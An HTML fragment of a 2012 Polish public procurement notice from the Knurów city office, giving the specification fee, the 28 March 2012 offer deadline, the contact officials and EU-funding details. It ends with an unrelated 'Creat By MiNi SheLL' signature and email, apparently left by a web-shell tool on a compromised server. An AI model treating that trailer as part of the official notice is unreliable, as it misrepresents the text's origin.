<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.knurow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Na wniosek wykonawcy w siedzibie zamawiającego - Wydział Zamówień Publicznych, pok. 218, w godz. 8:00 - 13:30 lub za zalicz. pocztowym po uiszczeniu opłaty w wys. 38,00 zł na konto zamawiającego.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.03.2012 godzina 10:00, miejsce: Urząd Miasta Knurów, ul. dr. F. Ogana 5, 44-190 Knurów, Wydział Zamówień Publicznych, pok. 218, II piętro.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Osobami uprawnionymi do porozumiewania się z wykonawcami są: 1)Naczelnik Wydziału Zamówień Publicznych - Grażyna Szweda, tel. 32 339-23-08, 2) Podinspektor Wydziału Zamówień Publicznych - Agnieszka Szulc, tel/fax 32 339-22-92, fax 32 441-97-44, e-mail: zp@knurow.pl.
Wykonawca może złożyć ofertę maksymalnie na 2 wybrane rejony..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com